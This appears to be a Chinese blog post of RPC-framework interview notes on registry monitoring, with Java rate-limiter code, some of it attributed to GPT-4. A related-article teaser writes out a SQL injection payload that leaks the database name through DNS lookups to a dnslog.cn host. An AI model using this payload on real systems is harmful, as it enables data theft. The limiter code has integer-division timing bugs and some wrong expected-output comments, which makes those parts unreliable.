深度思考rpc框架面经之五:rpc限流:rpc事务:tps测试
11 注册中心监控和rpc限流(用友云产品部二面)
11.1 你这个注册中心有实现相关的监控吗
11.1.1 如何实现注册中心有实现相关的监控
是的,我可以为你提供关于RPC注册中心及其监控的相关信息。RPC注册中心是用于管理微服务之间调用关系的中心化服务,它可以帮助微服务发现和调用其他服务。而监控是确保微服务健康、稳定运行的重要手段,可以实时检测和报警系统中的异常情况。
对于RPC注册中心的监控,通常包括以下几个方面:
-
服务健康检查:定期检查注册在注册中心的服务是否健康运行,如果服务出现故障,可以及时从注册中心摘除,防止其他服务调用失败。
-
服务调用统计:统计每个服务的调用次数、失败次数、平均响应时间等,帮助分析系统的运行状况。
-
资源使用情况:监控注册中心自身的CPU、内存、磁盘、网络等资源使用情况,确保注册中心稳定运行。
-
数据同步情况:对于集群部署的注册中心,需要监控各节点的数据同步情况,确保数据的一致性。
-
报警机制:当监控到异常情况时,可以通过邮件、短信、电话等方式及时通知运维人员。
常见的RPC注册中心如Zookeeper、Eureka、Consul、Nacos等,它们都提供了一定的监控功能或者有第三方工具支持其监控。
如果你需要更详细的信息或者对某个具体的RPC注册中心的监控有兴趣,可以告诉我,我会为你提供更多的资料。
11.1.2 consul和nacos分别如何实现注册中心的监控的
Consul和Nacos都是流行的服务注册与发现中心,它们都提供了一系列的监控和健康检查机制。以下是它们分别如何实现注册中心的监控的简要描述:
Consul:
-
健康检查:Consul内置了健康检查机制,允许定义多种检查方式,如HTTP、TCP、脚本等。当服务的健康状态发生变化时,Consul会自动更新服务的状态。
-
UI界面:Consul提供了一个Web UI界面,可以在其中查看集群的健康状态、服务列表、节点信息等。
-
Metrics接口:Consul提供了一个/metrics HTTP端点,可以获取Consul的运行指标,如请求率、请求延迟、集群领导选举次数等。
-
集成第三方监控工具:Consul的指标可以与Prometheus、Grafana等监控工具集成,以提供更丰富的监控视图和报警机制。
-
日志:Consul可以输出详细的日志,帮助诊断问题。
Nacos:
-
健康检查:Nacos也提供了健康检查机制,可以定期检查服务的健康状态,并根据结果更新服务的状态。
-
控制台:Nacos提供了一个管理控制台,可以在其中查看服务列表、健康状态、配置信息等。
-
Metrics接口:Nacos也提供了指标接口,可以获取Nacos的运行指标。
-
集成第三方监控工具:Nacos的指标可以与Prometheus、Grafana等监控工具集成。
-
日志:Nacos可以输出详细的日志,帮助运维人员诊断问题。
-
扩展性:Nacos提供了丰富的扩展点,允许用户自定义健康检查逻辑、数据源等。
总的来说,Consul和Nacos都提供了完善的监控和健康检查机制,可以确保服务的健康和稳定。但具体的实现细节和功能可能会有所不同,需要根据实际需求选择合适的工具。
11.1.3 详细讲讲consul和nacos实现注册中心健康检查的过程
当我们谈论服务注册中心的健康检查,我们主要是指如何确定注册的服务实例是否健康、是否能够正常提供服务。Consul和Nacos都提供了健康检查的机制,但它们的实现方式和细节有所不同。以下是Consul和Nacos实现健康检查的详细过程:
Consul:
-
定义健康检查:在Consul中,服务可以在注册时定义其健康检查的方式。这些方式包括HTTP、TCP、脚本和TTL。
- HTTP:Consul会定期向指定的HTTP端点发送请求,根据响应的HTTP状态码判断服务的健康状态。
- TCP:Consul会尝试建立到指定的TCP端口的连接,如果连接成功,则认为服务是健康的。
- 脚本:Consul会定期执行指定的脚本,并根据脚本的退出状态判断服务的健康状态。
- TTL:服务需要在指定的TTL时间内向Consul发送心跳,否则Consul会认为服务不健康。
-
健康状态更新:当服务的健康状态发生变化时,Consul会自动更新服务的状态。例如,如果一个服务的健康检查失败,Consul会将该服务标记为不健康,并从服务发现的结果中排除该服务。
-
健康状态查询:用户可以通过Consul的API或UI查询服务的健康状态。
Nacos:
-
心跳机制:Nacos主要依赖于心跳机制来检查服务的健康状态。当服务实例注册到Nacos后,它需要定期向Nacos发送心跳来表示它仍然是活跃的。
-
心跳超时:如果Nacos在指定的时间内没有收到服务实例的心跳,它会认为该服务实例不健康,并将其从服务列表中移除。
-
健康状态查询:用户可以通过Nacos的控制台或API查询服务的健康状态。
-
健康检查扩展:Nacos提供了健康检查的扩展点,允许用户自定义健康检查的逻辑。
总结:Consul提供了多种健康检查的方式,可以根据服务的特性选择合适的方式。而Nacos主要依赖于心跳机制来检查服务的健康状态,但它也提供了健康检查的扩展点,允许用户自定义健康检查的逻辑。两者都能够有效地确保服务的健康和稳定。
11.2 你整个的这个rpc调用,有考虑过它的限流嘛
对于一个QPS为2的服务,我们可以使用令牌桶、漏桶和滑动窗口计数器算法来实现限流。以下是每种算法的简单实现:
11.3 比如现在有两个服务,比如说qps只有2,现在达到限流的目的,分别使用令牌桶、漏桶和滑动窗口计数器算法,你如何实现呢
1. 令牌桶算法:
- 初始化一个容量为2的桶,并以每500ms放入一个令牌的速率填充桶。
- 当请求到来时,尝试从桶中取出一个令牌。
- 如果取出成功,请求继续。
- 如果取出失败(桶中无令牌),请求被限制。
import java.util.concurrent.locks.ReentrantLock;public class TokenBucket {private final int capacity;private int tokens;private long lastRefillTime;private final int refillRate;private final ReentrantLock lock = new ReentrantLock();public TokenBucket(int capacity, int refillRate) {this.capacity = capacity;this.refillRate = refillRate;this.tokens = capacity;this.lastRefillTime = System.currentTimeMillis();}public boolean tryConsume() {lock.lock();try {refill();if (tokens > 0) {tokens--;return true;}return false;} finally {lock.unlock();}}private void refill() {long now = System.currentTimeMillis();int tokensToAdd = (int) ((now - lastRefillTime) / 1000 * refillRate);if (tokensToAdd > 0) {tokens = Math.min(capacity, tokens + tokensToAdd);lastRefillTime = now;}}
}
2. 漏桶算法:
- 初始化一个容量为2的桶,并以每500ms处理一个请求的速率流出。
- 当请求到来时,尝试放入桶中。
- 如果放入成功,请求继续。
- 如果放入失败(桶已满),请求被限制。
import java.util.concurrent.locks.ReentrantLock;public class LeakyBucket {private final int capacity;private int water;private long lastLeakTime;private final int leakRate;private final ReentrantLock lock = new ReentrantLock();public LeakyBucket(int capacity, int leakRate) {this.capacity = capacity;this.leakRate = leakRate;this.water = 0;this.lastLeakTime = System.currentTimeMillis();}public boolean tryConsume() {lock.lock();try {leakWater();if (water < capacity) {water++;return true;}return false;} finally {lock.unlock();}}private void leakWater() {long now = System.currentTimeMillis();int waterToLeak = (int) ((now - lastLeakTime) / 1000 * leakRate);if (waterToLeak > 0) {water = Math.max(0, water - waterToLeak);lastLeakTime = now;}}
}
3. 滑动窗口计数器算法:
-
基于您的描述,我理解您希望使用一个滑动窗口计数器,其中每一秒都有一个独立的计数器。当请求到来时,我们将检查过去1秒内的请求计数。如果这个计数超过2,请求将被限制。
以下是基于这个想法的Java代码实现:
import java.util.LinkedList;public class SlidingWindowRateLimiter {private final LinkedList<RequestCounter> counters;private final int limit;public SlidingWindowRateLimiter(int limit) {this.counters = new LinkedList<>();this.limit = limit;}public synchronized boolean tryConsume() {long now = System.currentTimeMillis();long oneSecondAgo = now - 1000;// 清除1秒前的计数器while (!counters.isEmpty() && counters.getFirst().timestamp < oneSecondAgo) {counters.removeFirst();}// 获取过去1秒内的请求总数int totalCount = counters.stream().mapToInt(c -> c.count).sum();if (totalCount < limit) {// 如果当前秒的计数器不存在,创建一个if (counters.isEmpty() || counters.getLast().timestamp != now / 1000 * 1000) {counters.addLast(new RequestCounter(now / 1000 * 1000));}counters.getLast().count++;return true;}return false;}private static class RequestCounter {long timestamp;int count;RequestCounter(long timestamp) {this.timestamp = timestamp;this.count = 0;}}public static void main(String[] args) {SlidingWindowRateLimiter limiter = new SlidingWindowRateLimiter(2);System.out.println(limiter.tryConsume()); // trueSystem.out.println(limiter.tryConsume()); // trueSystem.out.println(limiter.tryConsume()); // false} }
这个实现确保在任何给定的1秒窗口内,请求的数量都不会超过2。
11.4 你给的滑动窗口计数器方案中,qps的速率固定死了,如果说某一个服务有异常,你的qps为2也达不到,只有1呢?而且服务恢复后,qps的速率能不能恢复到2
我的答案:配置一个灵活的限流器,每次读取限定的qps阈值的时候,可以读取根据从配置中心读取到的参数限制qps,至于是谁发出的调整阈值信号,则应该是注册中心。这种情况应对的是所有的服务调用不走注册中心,也不走负载均衡器或者其他第三方服务器,而是可以直接打到服务提供者,所以限流器得在服务的提供者端生效
gpt4答案:
您提到的问题确实是滑动窗口计数器在实际应用中可能会遇到的挑战。为了解决这个问题,我们可以引入动态调整QPS的机制。以下是一个简化的策略:
-
动态调整QPS:我们可以根据服务的健康状况动态调整QPS。例如,如果服务出现异常,我们可以降低QPS限制;当服务恢复正常时,我们可以逐渐提高QPS限制,直到达到原始的限制。
-
健康检查:我们可以定期检查服务的健康状况。如果服务响应时间增加或失败率上升,我们可以认为服务可能出现了问题,并相应地调整QPS限制。
-
平滑恢复:当服务恢复正常后,我们不应该立即将QPS限制提高到原始值,而应该逐渐提高,以确保服务不会再次被过载。
以下是一个简化的Java代码实现,展示如何动态调整QPS:
import java.util.LinkedList;public class DynamicSlidingWindowRateLimiter {private final LinkedList<RequestCounter> counters;private int currentLimit;private final int maxLimit;public DynamicSlidingWindowRateLimiter(int maxLimit) {this.counters = new LinkedList<>();this.currentLimit = maxLimit;this.maxLimit = maxLimit;}public synchronized boolean tryConsume() {long now = System.currentTimeMillis();long oneSecondAgo = now - 1000;// 清除1秒前的计数器while (!counters.isEmpty() && counters.getFirst().timestamp < oneSecondAgo) {counters.removeFirst();}// 获取过去1秒内的请求总数int totalCount = counters.stream().mapToInt(c -> c.count).sum();if (totalCount < currentLimit) {if (counters.isEmpty() || counters.getLast().timestamp != now / 1000 * 1000) {counters.addLast(new RequestCounter(now / 1000 * 1000));}counters.getLast().count++;return true;}return false;}public void adjustLimitBasedOnHealth(boolean isServiceHealthy) {if (isServiceHealthy) {currentLimit = Math.min(maxLimit, currentLimit + 1);} else {currentLimit = Math.max(1, currentLimit - 1);}}private static class RequestCounter {long timestamp;int count;RequestCounter(long timestamp) {this.timestamp = timestamp;this.count = 0;}}public static void main(String[] args) {DynamicSlidingWindowRateLimiter limiter = new DynamicSlidingWindowRateLimiter(2);System.out.println(limiter.tryConsume()); // trueSystem.out.println(limiter.tryConsume()); // trueSystem.out.println(limiter.tryConsume()); // false// 假设服务出现异常limiter.adjustLimitBasedOnHealth(false);System.out.println(limiter.tryConsume()); // trueSystem.out.println(limiter.tryConsume()); // false// 假设服务恢复正常limiter.adjustLimitBasedOnHealth(true);System.out.println(limiter.tryConsume()); // trueSystem.out.println(limiter.tryConsume()); // true}
}
这只是一个简化的示例,展示了如何根据服务的健康状况动态调整QPS。在实际应用中,可能需要更复杂的策略和实现。
12 rpc事务(用友云产品部二面)
12.1 你有没有考虑在rpc框架这一层面统一解决分布式事务呢?比如说A调用B,B事务是在另一台机器上执行的,执行失败后B会回滚,则你的rpc框架会告诉消费者服务事务B回滚了吗?这样的机制有考虑过嘛?
13 使用你的rpc框架后,tps测试了嘛(重要)(用友云产品部二面)
使用你的rpc框架后,tps测试了嘛(重要)
相关文章:
深度思考rpc框架面经之五:rpc限流:rpc事务:tps测试
11 注册中心监控和rpc限流(用友云产品部二面) 11.1 你这个注册中心有实现相关的监控吗 11.1.1 如何实现注册中心有实现相关的监控 是的,我可以为你提供关于RPC注册中心及其监控的相关信息。RPC注册中心是用于管理微服务之间调用关系的中心…...
[AIGC] Java序列化利器 gson
前言: 本篇文章主要介绍了Gson库,从是什么、为什么、怎么用三个方面进行了详细的介绍。在是什么部分,介绍了Gson库的作用和特点;在为什么部分,介绍了为什么要使用Gson库;在怎么用部分,介绍了如何…...
VMware 虚拟机删除+重建
由于本人暴力地关闭虚拟机,导致虚拟机出现了一些问题,并且还没有给虚拟机拍快照,虽然还能用,但本人不想将就,于是乎打算重新新建一个虚拟机 一、删除 1.打开workstation,选择虚拟机,右键选择移除。 虽然虚…...
环面上 FHE 的快速自举:LUT/Automata Blind Rotate
参考文献: [AP14] Alperin-Sheriff J, Peikert C. Faster bootstrapping with polynomial error[C]//Advances in Cryptology–CRYPTO 2014: 34th Annual Cryptology Conference, Santa Barbara, CA, USA, August 17-21, 2014, Proceedings, Part I 34. Springer B…...
VScode配置文件launch.json 和 tasks.json配置项详细说明
tasks.json tasks.json为编译配置文件 {"version": "2.0.0", // tasks.json 文件的版本号"tasks": [ // 任务数组,包含一个编译任务配置对象{"type": "cppbuild", // 任务类型,这里是 cppbuild …...
DNSlog 注入简单笔记
无回显的盲注可以想办法回显到 dns 日志上: 1、打开 http://www.dnslog.cn 获取域名 2、注入: ?id1 and (select load_file(concat(//,(select database()),.3.mw0gxd.dnslog.cn/a)))-- 3、点击刷新得到回显:...
HDLbits: Dualedge
FPGA没有双边缘触发触发器,(posedge clk或negedge clk)会报错 “FPGA(以及其他任何地方)上的触发器是一个具有一个时钟且仅对该时钟的一个边缘敏感的器件。”参考verilog为什么不能双边沿触发 实现双边沿的两种方法 …...
网络安全_黑客(自学)
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!!! 网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队…...
AI 大框架分析基于python之TensorFlow(归一化处理,多类别分类的概率)
AI 大框架分析基于python之TensorFlow(归一化处理,多类别分类的概率) AI(人工智能)的大框架有很多种,以下是一些常见的AI框架: TensorFlow:由谷歌开发的开源机器学习框架,支持各种任务,包括图像…...
C++day01(QT简介、C++)
今日任务: 代码: #include <iostream>using namespace std;int main() {/** 输入字符串统计大写、小写、数字、空格以及其他字符的个数**/string s;cout << "请输入一个字符串" << endl;//cin >> s;getline(cin,s);i…...
Web server failed to start. Port 8080 was already in use
一、问题 package com.djc.boot;import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annota…...
new和malloc的区别
new 和 malloc 都是在 C 中用于动态分配内存的方式,但它们之间有一些重要的区别 对象类型的区别: new:new 是 C 的关键字,用于动态分配对象。它可以调用对象的构造函数进行初始化,并返回指向所分配对象的指针。mallo…...
python:openpyxl 读取 Excel文件,显示在 wx.grid 表格中
pip install openpyxl openpyxl-3.1.2-py2.py3-none-any.whl (249 kB) et_xmlfile-1.1.0-py3-none-any.whl (4.7 kB) 摘要:A Python library to read/write Excel 2010 xlsx/xlsm files pip install wxpython4.2 wxPython-4.2.0-cp37-cp37m-win_amd64.whl (18.0 M…...
12P2532X152 KJ3222X1-BA1 CE4003S2B1 EMERSON DELTAV
12P2532X152 KJ3222X1-BA1 CE4003S2B1 EMERSON DELTAV 除了标准的实时计算、通信和控制,边缘设备和关键网络应用的fog通常执行人工智能(AI)、虚拟现实(VR)和增强现实(AR)解决方案。 目前,制药商和医疗保健机构对它们的需求快速增长,因为它们…...
P1014 [NOIP1999 普及组] Cantor 表
#include <bits/stdc.h> using namespace std; int main() {int n,k1;cin>>n;while (n>k) {nn-k;k;}if(k%20) cout<<n<<"/"<<(k1-n);else cout<<k1-n<<"/"<<n;return 0; }...
JMeter性能分析实战一:日常登录接口
负载测试 日常需求:负载测试! 对于桥的负载测试:我给你20t的一排车辆,看你能不能撑得住20t! 对于系统的负载测试: 逐步增加负载,便于问题的发现和定位,不要操之过急。逐步增加负载…...
内外网结合的多服务发布架构
1. 需求 1)有多个独立的web服务需要对外发布。 2)有AIGC的大模型服务需要在内网图形工作站上运行,也需要对外发布接口。 3)所有服务需要通过域名访问。 2. 现有资源 1)阿里云上的ECS云服务器一台,考虑…...
Unity中Shader的光照模型Lambert
文章目录 前言一、Lambert光照模型1、公式可以使用图形计算器来看出这个点积对于结果的影响 前言 Unity中Shader的光照模型Lambert 一、Lambert光照模型 1、公式 A:可以理解为环境光的颜色 K:反射系数 LC:主要的入射光的颜色 N:…...
(一)Log4Net - 介绍
0、相关概念 Log4j 几乎每个大型应用程序都包含自己的日志记录或跟踪 API。根据这一规则,E.U. SEMPER 🌹项目决定编写自己的跟踪 API。那是在 1996 年初。经过无数次的增强、几个化身和大量的工作,API 已经发展成为 log4j —— 一个流行的 Ja…...
[bug] mysql 时间与本地不一致
通过 select now() 查询到的时间比本机少了8个小时。 show variables like %time_zone%; //查询当前时区set global time_zone8:00; //在标准时区上加8小时,即东8区时间flush privileges; # 立即生效...
【改造先序遍历】222. 完全二叉树的节点个数
222. 完全二叉树的节点个数 解题思路-先序 直接改造先序遍历算法针对一个节点 如果节点为空 那么直接返回0其余交给递归 /*** Definition for a binary tree node.* public class TreeNode {* int val;* TreeNode left;* TreeNode right;* TreeNode() {}* …...
windows文件和目录相关命令
目录 dir:用于浏览当前文件夹的内容。 cd:用于更改所在的工作目录。 md:用于创建一个新的目录。 rd:用于删除文件夹,如果不加/s参数的话只能删除空目录。 echo:用于输出一段文本信息。 type࿱…...
TL-ER3220G端口映射设置
1、打开IE浏览器或其它浏览器,在地址栏输入192.168.1.1登录路由器的Web管理界面; 2、打开后弹出密码输入框,输入路由器的用户名和密码,出厂默认值为admin/admin,成功登录后将看到路由器的系统状态信息; 3、…...
MySQL Cluster
文章目录 1.简介2.组成参考文献 1.简介 MySQL Cluster 是官方推出的基于 NDB(Network DataBase)存储引擎的高可用和可伸缩的分布式数据库系统。 以下是 MySQL NDB Cluster 的主要特点和能力: 高可用:MySQL Cluster 具有内置的高…...
Spring封装的原生WebSocket使用,带组的实现
前言 为了和TIO来进行对比websocket的简易程度,我这篇就是写一下Spring原生的webSocket的正常操作 拿来对比就可以说说优劣性 正文 首先还是导入原生依赖,这里不需要写版本号 <dependency><groupId>org.springframework.boot</groupId><artifactId>spr…...
Linux高性能服务器编程 学习笔记 第十一章 定时器
网络程序需要处理定时事件,如定期检测一个客户连接的活动状态。服务器进程通常管理着众多定时事件,有效地组织这些定时事件,使其在预期的时间被触发且不影响服务器的主要逻辑,对于服务器的性能有至关重要的影响。为此,…...
jenkins拉取git代码 code 128解决方案
jenkins拉取git代码 code 128解决方案 处理方案: 先检查一下自己的账号正常是否有权限(如账号正常有权限请看第二步)找到Jenkins工作目录,重命名caches文件夹(或直接删除caches内的所有内容) # 进入到jenkins目录(注意…...
【Linux】 ls命令使用
ls(英文全拼: list directory contents)命令用于显示指定工作目录下之内容(列出目前工作目录所含的文件及子目录)。 ls命令 -Linux手册页 著者 由Richard M.Stallman和David MacKenzie撰写。 语法 ls [-alrtAFR] [name...] ls命…...
【CVE-2023-35843】NocoDB 任意文件读取漏洞
一、漏洞描述 NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。 二、影响范围 NocoDB<0.106.1 三、网络空间搜索引擎搜索 fofa查询 icon_hash"-…...
在 ubuntu 22.04 上配置界面服务器 vnc
xrdp服务器的安装 步骤 1.安装服务器 $ sudo apt install tightvncserver // 命令过后并没有启动服务器 // 这个包没有 systemd 脚本,其不被 systemd 管理!!!查看配置 $ cat ~/.vnc/xstartup #!/bin/shxrdb "$HOME/.Xresources" xsetroot -solid grey #x-termina…...
游戏推广赚佣金/电脑系统优化软件十大排名
Linux低电量自动关机的实现方法,当笔记本电量低了之后,会自动关机,配合crontab 或者 systemd timers 定时检查。check_shutdown.timer:$ cat /etc/systemd/system/check_shutdown.timer[Unit]DescriptionCheck if battery is low every 10 mi…...
苏州专业网站建设开发/正在直播足球比赛
输入一串字符,字符个数不超过100,且以“.”结束。 判断它们是否构成回文。【分析】所谓回文指从左到右和从右到左读一串字符的值是一样的,如12321,ABCBA,AA等。先读入要判断的一串字符(放入数组letter中),并记住这串字符的长度&am…...
苏州高新区建设局网站管网/360免费建站
在使用linux系统中大多都是通过文本页面输入命令来进行操作,linux默认的shell就是bash,所以我们有必要对shell进行深入了解bash特性:一、命令别名:(自定义命令)alias命令可以用来定义和显示命令的别名。但是使用alias命令定义的别…...
昆明网站建设推荐q479185700上墙/百度推广客服电话多少
SwiftUI 问答之 在初始化之前使用的变量 @State var 初始化问题 实战问题 我收到以下编译错误:“在初始化之前使用了变量‘self.entryData’”如何修复它并在我的 init 方法中正确初始化 @state var entryData? struct EditEntryView: View {@Environment(\.managedObject…...
网站开发的书/关键词排名查询网站
转自:http://www.jb51.net/article/84924.htm取整(向下取整):复制代码代码如下:select floor(5.534) from dual;select trunc(5.534) from dual;上面两种用法都可以对数字5.534向下取整,结果为5.如果要向上取整 ,得到结果为6&…...
卡盟网站怎么做图片素材/班级优化大师怎么加入班级
vantui是一个基于Vue.js的组件库,它提供了文件上传组件,可以方便地在Vue.js应用中实现文件上传功能。使用vantui文件上传组件,你可以在网页中选择文件并将其上传到服务器。它支持多文件上传、文件限制、文件类型限制等功能。使用vantui文件上…...